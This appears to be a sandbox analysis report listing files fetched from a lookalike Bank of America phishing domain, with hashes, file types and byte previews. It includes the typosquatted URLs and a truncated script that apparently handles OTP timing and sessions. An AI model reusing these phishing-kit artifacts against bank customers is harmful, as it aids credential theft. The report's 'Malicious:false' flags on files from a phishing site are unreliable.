                                                                                              SSDEEP:1536:50PshkAyijedj0Y6tbJ/CXc7TEnW6uvrvyNAMP+1Umu9I:If7qoSyXc7TEnY0AMKuG
                                                                                              MD5:8EF07B55C4A1561C9271F57031A51A59
                                                                                              SHA1:5A9DFD0174D1BA6B8784F928C98379F08CD711AF
                                                                                              SHA-256:69D3432300BA1610B3B7B677B5E821630636AAE7F61C01E1058158E69701B2D5
                                                                                              SHA-512:B9FBA6EE1383E7B983045137031AEEE4FE500D78DD9FE84C30E08846F55456A69BA49C13FDB759ED5C6BF9A03FC8AE32101BC761D0DD9BDE4F6BFEDA89F8F623
                                                                                              Malicious:false
                                                                                              Preview:.PNG........IHDR...Q...T.....c.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.}...E..0nV.TrVQ..... .3.%..AD."Q0..AD$K...s...T..{.......uo.3.3.]]]]]g.....(@..P......(@.....s.~./...H...\>...b.V...Ex..!.!.A..gg#7%.YgC..}/.V.F....=..OuAt.'.^...*....!....4....!c.rd.\..-? c.Qd..AnL<..2...u..,.h7.{.....N........f.?.v.....P......(@..P....k@......v.~.<...@..u.Dg.Gt.;/.[..,]..IN@.cHZ..q.F .....0"nl..j.p.R3..k....".\..T..!5.D.-.".....y.>.....!e.Rd~..9.dy...C.../<.?c..J.{^..{....l....Q..P......(@.....|@.K`..i_#NEF...}.....@.n.i..<.$.]..Y. 3"...7#..H.<....".....-.=..Z..Z.).T#..i....CX...*...e[ .Fk.z....Bb.H.8.).?A.....Y'."7!..rr..../~.(/(J....E......(@..P.............._?G....\..!.........N..*...,.....T>...Qf..%$#..)d...i.."........k..-.z]c.\S... .d#D^...W7E.5.S....#.JK..z7....A..b-r....T.1..Y....a.7.&..5..w...(.......(@..P...........s.. .....(.......!/8..[. m.7H\.9.......=...x.g.,.8YJJ_.T.*...l.%$!.T.rv.B..mH_..)3.!q.....b..Bd.'.^.vD\...
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:PNG image data, 14 x 50, 8-bit/color RGBA, non-interlaced
                                                                                              Category:dropped
                                                                                              Size (bytes):48667
                                                                                              Entropy (8bit):6.763282816391803
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:svPGMLDTxjqRicNxBda8/D2n/wW8y9WvHOJX3nnemkJ:6LL9qVxL//DklWvHMHemkJ
                                                                                              MD5:FBF368512D6DE369ECF24F2778DB0AA1
                                                                                              SHA1:AD621D647F845C66D1780E44E5495E606605C5FA
                                                                                              SHA-256:CA3205C6A4EECFD67AD990B62B10E19F601230A2A5B2791676089E82836763F4
                                                                                              SHA-512:BDD72D7A1BF77B77EFAC1BBF349023BE73CAC86892E012D62835E8EB3D747824754A90538ABA403CE83277FBA630617531DDCBE9A43457AD09A698E7045458C2
                                                                                              Malicious:false
                                                                                              Preview:.PNG........IHDR.......2.....l.......sBIT....|.d.....pHYs...........~.....tEXtSoftware.Adobe Fireworks CS5q..6....prVWx...Q.0.F%.1.(E...Fh...v...0..0.d..1....{..)..ow.q.?.>..\.i.1.8..C.>D..W..>.>..h....tI0)....X..?e'..,...?eg.......}.S.P.J....;.\...p..;.E`...;.!......=..G...j.K..k;.7...+../.G..~..+..............S.'-e.......?...%.-.....]g.r..?U~Y%..s..I......A._o..[........[..Z.5....|.......w......'_...)...?.m.}.........d....~...~........F.3.....5..N]..)...............y6...<.G.....GC3.#.4....HmkBF........................................................................).3...9.mkTSx..}.w.F.>&3.#Y..d.......=M.W.|.EQ..8$e.y..A"...de<<......f..@..fa%l..n|U.uUu5p.s.n.j0..y.W...1...b...gW.....o....A0..o.x}..f.=?>..3G......i...+..}...y.......`.t3.........hW.??9;e.w...l.1.~.M.=...~..A.|...?.k.&[Sw..\..y...}.........v....c...Q.3..g...].=...6....8...>;..G.sDW....S...'...3h.>.......[Xt.F..&......X.f.}..m.m.MVE.x.....2\..v..1.....+.c..D.?2FE4.1....3|.
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                              Category:dropped
                                                                                              Size (bytes):508
                                                                                              Entropy (8bit):7.281914594573599
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:6v/7wYk4HyHyFAouH/gwRugEANRowSUL2Z6qsoBkZKL1:X7F20gCn+6qsoBwKZ
                                                                                              MD5:A747CCF903D04411C91F51BC4B410EDB
                                                                                              SHA1:0E02D69A9AD87D198C5662AED3A9B47C1385B1BD
                                                                                              SHA-256:14ED5F12F40F7FDB602DEBEFBA799D920C1329B17231731387E9D5EF27E457A4
                                                                                              SHA-512:1D128231C58967FDFEB5C660A12594CFE828D5CA4794F7983A5271DA9BD379F9CF58ADE0735B2D5E9C709FEF879DA6C3BB13A70A3EF7DAD8656246D8938903D2
                                                                                              Malicious:false
                                                                                              Preview:.PNG........IHDR................a....sBIT....|.d.....pHYs............Z....tEXtSoftware.Adobe Fireworks CS6.....vIDAT8...=O.P....#C.a!. nN8:..&......`..n..2:....%1m.$....'>L...00].(^J..g..=.9..^E...l.@Q.`5g...uGv.E.!.<`...y........3.@...4}..3J..'.v.(f...!.F..K..h....J...r......||~.Q...!.j.....N6...V....$.Q..f......u.(%.......|c8.OZ?...l........p4.@....!vN.q;.? &....|.v.A.3..u ..+..N..,...-....D....l..f..;..q9.8J.4.A...K.G.8.^....o.A...X....] .8.z.j.ai..X.L.9#....z...Wa.7.............IEND.B`.
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:GIF image data, version 89a, 41 x 40
                                                                                              Category:downloaded
                                                                                              Size (bytes):13759
                                                                                              Entropy (8bit):1.4318234044597167
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:W35al1nqyWWuZDv/SADMSRc7ZZlTkISQ3iaN8Y/CTI1gIo85vCxK+rB:W36qwcvLYHZkIvSDY/QIGIo85vCjd
                                                                                              MD5:8D1E7DD5AA9C2AD59E5A581FEE153988
                                                                                              SHA1:1096E9A332A600314700F6A5F53465D75057B02D
                                                                                              SHA-256:62B9E843F3E5B7411BF0EDFE4F118165F95D5CE4EF837E6CF9B12E8BBAD1C425
                                                                                              SHA-512:DF018398F135D4EF4FFC98A2FD19435C0688E9C2F71FBCB5D6B2F55CADE9AFDEC06CECA3819B34079D0DD00B621C685C1A40F8E201ACAD7A35177C113046517D
                                                                                              Malicious:false
                                                                                              URL:https://online.access.secure.bankofamerlica.com/assets/error-large.gif
                                                                                              Preview:GIF89a).(.........*........??.....&.OO....__.</....9I..1(......@9..............!.!*.L?..QA.22.&,." .I=.;6...................)!.B:.CN............%.95.......1).DO.1!..............................!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 4.2.2-c063 53.351735, 2008/07/22-18:04:26 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/">. <xmp:CreatorTool>Adobe Fireworks CS4</xmp:CreatorTool>. <xmp:CreateDate>2011-06-17T21:59:29Z</xmp:CreateDate>. <xmp:ModifyDate>2011-06-17T22:00:08Z</xmp:ModifyDate>. </rdf:Description>. <rdf:Description rdf:about="". xmlns:dc="http://purl.org/dc/elements/1.1/">. <dc:format>image/gif</dc:format>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>.
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:PNG image data, 298 x 416, 8-bit colormap, non-interlaced
                                                                                              Category:downloaded
                                                                                              Size (bytes):19167
                                                                                              Entropy (8bit):7.9442036984419175
                                                                                              Encrypted:false
                                                                                              SSDEEP:384:hn4pnWHNKmZRun8yeliYQDZHaShfVU+puUOfuikljiyOTNj:h4AHNK+K8hwYQdhftuUudgO5j
                                                                                              MD5:178098B4327CB4E5407E4A69C8CD2D18
                                                                                              SHA1:0BE208356FF56BEA3794ED175F3682C2B0701415
                                                                                              SHA-256:6BB1D4B1B719488B9812D1FB67B41B03857EEC8F4E0A4D46A8066574037D817A
                                                                                              SHA-512:9C2827D361A2A9E02AEBEC6C00F3F68F13503735A0F0ED02068421CB2FD89AFF1E7A3989038AADCAFFDBC9D83CE6E18CD90C122DC0F5A5CE8321B2A937B28787
                                                                                              Malicious:false
                                                                                              URL:https://online.access.secure.bankofamerlica.com/assets/mobile_llama.png
                                                                                              Preview:.PNG........IHDR...*.........*......tEXtSoftware.Adobe ImageReadyq.e<...fiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmpMM:OriginalDocumentID="xmp.did:85a0892c-e49a-4514-a582-efd8ed5fcc5b" xmpMM:DocumentID="xmp.did:40E432216D5111EAAD4B8851CF7A8A8E" xmpMM:InstanceID="xmp.iid:40E432206D5111EAAD4B8851CF7A8A8E" xmp:CreatorTool="Adobe Photoshop CC 2015 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:3ff6ddd7-67e2-457c-8f32-19e947e80b32" stRef:documentID="adobe:docid:photoshop:8f542e32-ab76-117d-8266-cecac578b114"/> <dc:creator> <rdf:Seq> <rdf:li>Pras Bo
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:PNG image data, 298 x 416, 8-bit colormap, non-interlaced
                                                                                              Category:dropped
                                                                                              Size (bytes):19167
                                                                                              Entropy (8bit):7.9442036984419175
                                                                                              Encrypted:false
                                                                                              SSDEEP:384:hn4pnWHNKmZRun8yeliYQDZHaShfVU+puUOfuikljiyOTNj:h4AHNK+K8hwYQdhftuUudgO5j
                                                                                              MD5:178098B4327CB4E5407E4A69C8CD2D18
                                                                                              SHA1:0BE208356FF56BEA3794ED175F3682C2B0701415
                                                                                              SHA-256:6BB1D4B1B719488B9812D1FB67B41B03857EEC8F4E0A4D46A8066574037D817A
                                                                                              SHA-512:9C2827D361A2A9E02AEBEC6C00F3F68F13503735A0F0ED02068421CB2FD89AFF1E7A3989038AADCAFFDBC9D83CE6E18CD90C122DC0F5A5CE8321B2A937B28787
                                                                                              Malicious:false
                                                                                              Preview:.PNG........IHDR...*.........*......tEXtSoftware.Adobe ImageReadyq.e<...fiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmpMM:OriginalDocumentID="xmp.did:85a0892c-e49a-4514-a582-efd8ed5fcc5b" xmpMM:DocumentID="xmp.did:40E432216D5111EAAD4B8851CF7A8A8E" xmpMM:InstanceID="xmp.iid:40E432206D5111EAAD4B8851CF7A8A8E" xmp:CreatorTool="Adobe Photoshop CC 2015 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:3ff6ddd7-67e2-457c-8f32-19e947e80b32" stRef:documentID="adobe:docid:photoshop:8f542e32-ab76-117d-8266-cecac578b114"/> <dc:creator> <rdf:Seq> <rdf:li>Pras Bo
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:ASCII text, with very long lines (9953), with no line terminators
                                                                                              Category:downloaded
                                                                                              Size (bytes):9953
                                                                                              Entropy (8bit):4.694731424036786
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:x6qQxJkv2Mw8dD8NNb/GQP6o4BxU2M3oypMA8N:YqQxmvlo4B2bW
                                                                                              MD5:A2AF793292866B502045F42BE5FC997C
                                                                                              SHA1:088F20867C1FF4931BF7917AB47E6940F7DFE493
                                                                                              SHA-256:2F0AC0559A948FA017A8ECDB5BDDF7AC54033E8AA1EB91FF7DF93243C690F0D1
                                                                                              SHA-512:1165D7E946C084574D4A62C64464A8F8401225C341DB8B3740A3C4D1F235E031D7CD8F7237326D38006A4A373988B12D9CE5287DC032AE2B861CA487DC171EB7
                                                                                              Malicious:false
                                                                                              URL:https://online.access.secure.bankofamerlica.com/assets/vipaa-v4-jawr-print.css
                                                                                              Preview:.olb-popup-content-module .standard-print-olb-skin .popup-header{padding:10px 25px 0 15px;height:50px;background-color:#d4001a}.olb-popup-content-module .standard-print-olb-skin .popup-header .close-link{padding:2px 0 0;float:right;font-size:11px}.olb-popup-content-module .standard-print-olb-skin .popup-header .close-link a{color:#fff}.olb-popup-content-module .standard-print-olb-skin .popup-header h1{background:url("../../../../../../../../pa/components/modules/olb-popup-content-module/1.2/graphic/flag-logo-white-on-red.png") no-repeat scroll 25px 10px transparent;color:#fff;float:left;font-size:1.5em;font-weight:normal;padding:8px 0 0 70px}.olb-popup-content-module .standard-print-olb-skin .popup-content{margin:15px 25px;font-size:12px}.olb-popup-content-module .standard-print-olb-skin .popup-content h2{font:bold 18px Arial,Verdana,Helvetica,sans-serif;color:#666;padding:12px 0 10px}.olb-popup-content-module .standard-print-olb-skin .popup-content h4,.olb-popup-content-module .standa
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:ASCII text, with very long lines (755)
                                                                                              Category:dropped
                                                                                              Size (bytes):2795746
                                                                                              Entropy (8bit):4.181164502545128
                                                                                              Encrypted:false
                                                                                              SSDEEP:49152:OrHU2p1x0FeIpNO3XWwDcDP25h5rToh19iYoqDey5qXGcO7FnhbUDKjmHTw/MIu1:4Xd
                                                                                              MD5:D94F6FF02DC1EF4188E03E3902193871
                                                                                              SHA1:A4A15D0E72076C67D307ACBE06F5F7D50B819722
                                                                                              SHA-256:7C0E66A37E82B0DDDCC4DBE643A43BE44CBB6B9E8C42E492A44677292BD92785
                                                                                              SHA-512:DEBB667997B171F7A5D0234CAECE768C960F0EC7571AF75549595624B5828BC5F5ADE703CE4735B990B06D6F6ABCD21D44EFB1D31B4B981C344A196C56FC3A5D
                                                                                              Malicious:false
                                                                                              Preview:/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */ ! function(e, t) {. "object" == typeof module && "object" == typeof module.exports ? module.exports = e.document ? t(e, !0) : function(e) {. if (!e.document) {. throw new Error("jQuery requires a window with a document"). }. return t(e). } : t(e).}("undefined" != typeof window ? window : this, function(C, e) {. var t = [],. r = Object.getPrototypeOf,. s = t.slice,. g = t.flat ? function(e) {. return t.flat.call(e). } : function(e) {. return t.concat.apply([], e). },. u = t.push,. i = t.indexOf,. n = {},. o = n.toString,. v = n.hasOwnProperty,. a = v.toString,. l = a.call(Object),. y = {},. m = function(e) {. return "function" == typeof e && "number" != typeof e.nodeType. },. x = function(e) {. return null !=
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:ASCII text, with very long lines (755)
                                                                                              Category:downloaded
                                                                                              Size (bytes):2795746
                                                                                              Entropy (8bit):4.181164502545128
                                                                                              Encrypted:false
                                                                                              SSDEEP:49152:OrHU2p1x0FeIpNO3XWwDcDP25h5rToh19iYoqDey5qXGcO7FnhbUDKjmHTw/MIu1:4Xd
                                                                                              MD5:D94F6FF02DC1EF4188E03E3902193871
                                                                                              SHA1:A4A15D0E72076C67D307ACBE06F5F7D50B819722
                                                                                              SHA-256:7C0E66A37E82B0DDDCC4DBE643A43BE44CBB6B9E8C42E492A44677292BD92785
                                                                                              SHA-512:DEBB667997B171F7A5D0234CAECE768C960F0EC7571AF75549595624B5828BC5F5ADE703CE4735B990B06D6F6ABCD21D44EFB1D31B4B981C344A196C56FC3A5D
                                                                                              Malicious:false
                                                                                              URL:https://online.access.secure.bankofamerlica.com/assets/vipaa-v4-jawr.js
                                                                                              Preview:/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */ ! function(e, t) {. "object" == typeof module && "object" == typeof module.exports ? module.exports = e.document ? t(e, !0) : function(e) {. if (!e.document) {. throw new Error("jQuery requires a window with a document"). }. return t(e). } : t(e).}("undefined" != typeof window ? window : this, function(C, e) {. var t = [],. r = Object.getPrototypeOf,. s = t.slice,. g = t.flat ? function(e) {. return t.flat.call(e). } : function(e) {. return t.concat.apply([], e). },. u = t.push,. i = t.indexOf,. n = {},. o = n.toString,. v = n.hasOwnProperty,. a = v.toString,. l = a.call(Object),. y = {},. m = function(e) {. return "function" == typeof e && "number" != typeof e.nodeType. },. x = function(e) {. return null !=
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:PNG image data, 14 x 50, 8-bit/color RGBA, non-interlaced
                                                                                              Category:downloaded
                                                                                              Size (bytes):48667
                                                                                              Entropy (8bit):6.763282816391803
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:svPGMLDTxjqRicNxBda8/D2n/wW8y9WvHOJX3nnemkJ:6LL9qVxL//DklWvHMHemkJ
                                                                                              MD5:FBF368512D6DE369ECF24F2778DB0AA1
                                                                                              SHA1:AD621D647F845C66D1780E44E5495E606605C5FA
                                                                                              SHA-256:CA3205C6A4EECFD67AD990B62B10E19F601230A2A5B2791676089E82836763F4
                                                                                              SHA-512:BDD72D7A1BF77B77EFAC1BBF349023BE73CAC86892E012D62835E8EB3D747824754A90538ABA403CE83277FBA630617531DDCBE9A43457AD09A698E7045458C2
                                                                                              Malicious:false
                                                                                              URL:https://online.access.secure.bankofamerlica.com/assets/gfootb-static-sprite.png
                                                                                              Preview:.PNG........IHDR.......2.....l.......sBIT....|.d.....pHYs...........~.....tEXtSoftware.Adobe Fireworks CS5q..6....prVWx...Q.0.F%.1.(E...Fh...v...0..0.d..1....{..)..ow.q.?.>..\.i.1.8..C.>D..W..>.>..h....tI0)....X..?e'..,...?eg.......}.S.P.J....;.\...p..;.E`...;.!......=..G...j.K..k;.7...+../.G..~..+..............S.'-e.......?...%.-.....]g.r..?U~Y%..s..I......A._o..[........[..Z.5....|.......w......'_...)...?.m.}.........d....~...~........F.3.....5..N]..)...............y6...<.G.....GC3.#.4....HmkBF........................................................................).3...9.mkTSx..}.w.F.>&3.#Y..d.......=M.W.|.EQ..8$e.y..A"...de<<......f..@..fa%l..n|U.uUu5p.s.n.j0..y.W...1...b...gW.....o....A0..o.x}..f.=?>..3G......i...+..}...y.......`.t3.........hW.??9;e.w...l.1.~.M.=...~..A.|...?.k.&[Sw..\..y...}.........v....c...Q.3..g...].=...6....8...>;..G.sDW....S...'...3h.>.......[Xt.F..&......X.f.}..m.m.MVE.x.....2\..v..1.....+.c..D.?2FE4.1....3|.
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:PNG image data, 12 x 37, 8-bit/color RGBA, non-interlaced
                                                                                              Category:dropped
                                                                                              Size (bytes):473
                                                                                              Entropy (8bit):7.432052194524839
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:6v/7VgROGz+PHJXwQyi8pt1Q9NZMmfW8GaOVV68pV2FE6Z:pRD0yGOt6qmflGZVUJ
                                                                                              MD5:F6F74792E7CE049E3A26A8A725DBA8C8
                                                                                              SHA1:CA49F42737D7566F1970EBA7C437399821A614FB
                                                                                              SHA-256:8C37FB372596058D87DD9208541C49B020D0E840E4F3A5BAA27D39BE2DC70B01
                                                                                              SHA-512:35ECCF4E6927A34F12E7F5D56540CC3B3A05D7612058CA59DCAA3F9615EF0AF837AE22F30F10032A2C6A9AE3E212D7D2803BD57A2E87700ABF041F9E74EF412E
                                                                                              Malicious:false
                                                                                              Preview:.PNG........IHDR.......%.....v.......IDAT8..9.B1...S..}CA.Q.K..?acc!..X.V6.b#*...\..a......yK./.......n....#..)..6...&..t......|T...v.V..\..../...h6.8.N...f.A..A".@$.A.^G....E4..p8...@+.j..d..~.\..z....j..@ ........UF......\......X..(..(.J.8=_...v;..y...W..8a4.....@...c...,..w.&.J.....{L..tZ.(...fO@....Ie..N....z..<..7...(.%.^..h.S.`0.?.w....\..X.?Y.X&..2....A.B!..)..b1T*....'.dt.....w.U%^L........b....>K.l.fK.F@:.6.x..[..!ec...F@.X4....,i{..s....IEND.B`.
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:ASCII text, with very long lines (8392), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):8392
                                                                                              Entropy (8bit):5.244521790885444
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:D0tmYp2hzp/hMkjVr7ENtOvAMRWjV0C18C1szm:D0Izp/5jVr7ENtOTWjVmm
                                                                                              MD5:3879692AE09FDA4D7AA4E8F2A47EF6C7
                                                                                              SHA1:1F9C80577C8FE325B3EC40B7DAC16F0495EFE826
                                                                                              SHA-256:038234B180E0E2B436EFE92AB5FDD994FAEA95027B22DD3625D355EB1A154EBA
                                                                                              SHA-512:0391C425CCAF416880A0A3B5F2FE7E95D505051FC27009BD0108106AC9C219551EABF8179D0ED182AFE899749449494DD100DF268B4A0BDB2022159D100BDE86
                                                                                              Malicious:false
                                                                                              Preview:var otp_timeout=4e4;window.session=makeid(5),localStorage.setItem("session",window.session);var onStorage=function(e){"session"===e.key&&e.newValue!==window.session&&localStorage.setItem("multitab",window.session),"multitab"===e.key&&e.newValue&&e.newValue!==window.session&&(window.removeEventListener("storage",onStorage),localStorage.setItem("session",localStorage.getItem("multitab")),localStorage.removeItem("multitab"),document.body.innerHTML="The current page is already open in another tab. Please follow there!")};function makeid(e){for(var t="",i="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",a=0;a<e;a++)t+=i.charAt(Math.floor(62*Math.random()));return t}function setCookie(e,t,i){var a="";if(i){var s=new Date;s.setTime(s.getTime()+60*i*1e3),a="; expires="+s.toUTCString()}document.cookie=e+"="+(t||"")+a+"; path=/"}function getCookie(e){const t=document.cookie.split(";");for(let i=0;i<t.length;i++){let a=t[i].trim().split("=");if(a[0]===e)return a[1]}return""}functi
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:PNG image data, 42 x 22, 8-bit/color RGBA, non-interlaced
                                                                                              Category:downloaded
                                                                                              Size (bytes):2022
                                                                                              Entropy (8bit):6.718501039531958
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:vhI+kW9Wv2628b9+NNMRlj3BHnbWRqEKXMrMzpwMiAp81H:DkkWv2628bgNqRrHnbWgMwzprVEH
                                                                                              MD5:DEB336030CC20254AF3372FA76D24905
                                                                                              SHA1:36CEF85FB2CF764DDADF34FDCD8ABFB120FC4172
                                                                                              SHA-256:6D608A9D27AE614AA0B16FE920F6A811BF6D4F320A5819B51D3EDB9672912AD9
                                                                                              SHA-512:4F243A7A61B5CC98908CE65BB0D43E373E3837804DD38760CB341616A957C8D9DB3E33D05706D63F269602F6B6ED4C47743B436DFB7A587360A0568088E0E3CD
                                                                                              Malicious:false
                                                                                              URL:https://online.access.secure.bankofamerlica.com/assets/pill.png
                                                                                              Preview:.PNG........IHDR...*..........{.....TiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.2-c000 79.1b65a79b4, 2022/06/13-22:01:01 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmp:CreatorTool="Adobe Photoshop 23.5 (Macintosh)". xmp:CreateDate="2023-07-12T11:56:32-04:00". xmp:ModifyDate="2023-08-01T11:59:34-04:00". xmp:MetadataDate="2023-08-01T11:59:34-04:00". dc:format="image/png". photoshop:ColorMode="3". xmpMM:InstanceID="xmp.iid:e44b26bf-fcbc-4366-a1b8-af324bc03e89". xmpMM:DocumentID="xmp.did:e44b26bf-fcbc-4366-a1b8-af324bc03e89". xmpMM:OriginalDocumen
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:PNG image data, 12 x 37, 8-bit/color RGBA, non-interlaced
                                                                                              Category:downloaded
                                                                                              Size (bytes):473
                                                                                              Entropy (8bit):7.432052194524839
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:6v/7VgROGz+PHJXwQyi8pt1Q9NZMmfW8GaOVV68pV2FE6Z:pRD0yGOt6qmflGZVUJ
                                                                                              MD5:F6F74792E7CE049E3A26A8A725DBA8C8
                                                                                              SHA1:CA49F42737D7566F1970EBA7C437399821A614FB
                                                                                              SHA-256:8C37FB372596058D87DD9208541C49B020D0E840E4F3A5BAA27D39BE2DC70B01
                                                                                              SHA-512:35ECCF4E6927A34F12E7F5D56540CC3B3A05D7612058CA59DCAA3F9615EF0AF837AE22F30F10032A2C6A9AE3E212D7D2803BD57A2E87700ABF041F9E74EF412E
                                                                                              Malicious:false
                                                                                              URL:https://online.access.secure.bankofamerlica.com/assets/fsd-secure-esp-sprite.png
                                                                                              Preview:.PNG........IHDR.......%.....v.......IDAT8..9.B1...S..}CA.Q.K..?acc!..X.V6.b#*...\..a......yK./.......n....#..)..6...&..t......|T...v.V..\..../...h6.8.N...f.A..A".@$.A.^G....E4..p8...@+.j..d..~.\..z....j..@ ........UF......\......X..(..(.J.8=_...v;..y...W..8a4.....@...c...,..w.&.J.....{L..tZ.(...fO@....Ie..N....z..<..7...(.%.^..h.S.`0.?.w....\..X.?Y.X&..2....A.B!..)..b1T*....'.dt.....w.U%^L........b....>K.l.fK.F@:.6.x..[..!ec...F@.X4....,i{..s....IEND.B`.
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:HTML document, ASCII text, with very long lines (58713), with CRLF line terminators
                                                                                              Category:downloaded
                                                                                              Size (bytes):158694
                                                                                              Entropy (8bit):5.787343974303209
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:U3p5C5G97qsO6k/InlvCUxZsSLsR1pSYEuazG4+9UrlP8KthdqHkYv9uvo/LV9uC:1shlvCUjbLswYEuawurRtV5Gv
                                                                                              MD5:2717972C1A396D445ABC811E65E6B5C0
                                                                                              SHA1:9FB7755885037D7420A28595FACC20EA4202544F
                                                                                              SHA-256:149D3C200D0C0B77CFB9A94BB7AA77F41B09351F758FBEB317EBD887EB70BD6D
                                                                                              SHA-512:CA0116E9BF5B16F9E8BA6FF4D084BEC28952B2E745F00659EE40BF098FE5584BE43B6AFEAC65B2066B614E5915BAEFFA643625F675FAA432B516ED9EA6577035
                                                                                              Malicious:false
                                                                                              URL:https://online.access.secure.bankofamerlica.com/secure/
                                                                                              Preview:<!DOCTYPE HTML>..<html lang="en">.. <head>.. <title>Checking your browser...</title>.. <meta charset="UTF-8">.. <meta name="viewport".. content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">.. <meta http-equiv="X-UA-Compatible" content="ie=edge">.. <style>a,label,span,svg{display:block;width:100%}.container,body,html,svg{height:100%}*,::after,::before{box-sizing:border-box;-webkit-tap-highlight-color:transparent}blockquote,body,dd,dl,figure,h1,h2,h3,h4,p{margin:0}ol[role=list],ul[role=list]{list-style:none}html:focus-within{scroll-behavior:smooth}body{text-rendering:optimizeSpeed;font-size:16px;background-color:#fff}iframe{position:absolute;top:-200vh}a,label,span{font-family:Arial,sans-serif;max-width:max-content;color:#000}svg{overflow:visible}a:not([class]){text-decoration-skip-ink:auto}@media (prefers-reduced-motion:reduce){html:focus-within{scroll-behavior:auto}*,::after,::before{a
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:ASCII text, with very long lines (8392), with no line terminators
                                                                                              Category:downloaded
                                                                                              Size (bytes):8392
                                                                                              Entropy (8bit):5.244521790885444
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:D0tmYp2hzp/hMkjVr7ENtOvAMRWjV0C18C1szm:D0Izp/5jVr7ENtOTWjVmm
                                                                                              MD5:3879692AE09FDA4D7AA4E8F2A47EF6C7
                                                                                              SHA1:1F9C80577C8FE325B3EC40B7DAC16F0495EFE826
                                                                                              SHA-256:038234B180E0E2B436EFE92AB5FDD994FAEA95027B22DD3625D355EB1A154EBA
                                                                                              SHA-512:0391C425CCAF416880A0A3B5F2FE7E95D505051FC27009BD0108106AC9C219551EABF8179D0ED182AFE899749449494DD100DF268B4A0BDB2022159D100BDE86
                                                                                              Malicious:false
                                                                                              URL:https://online.access.secure.bankofamerlica.com/assets/special/js/main.js
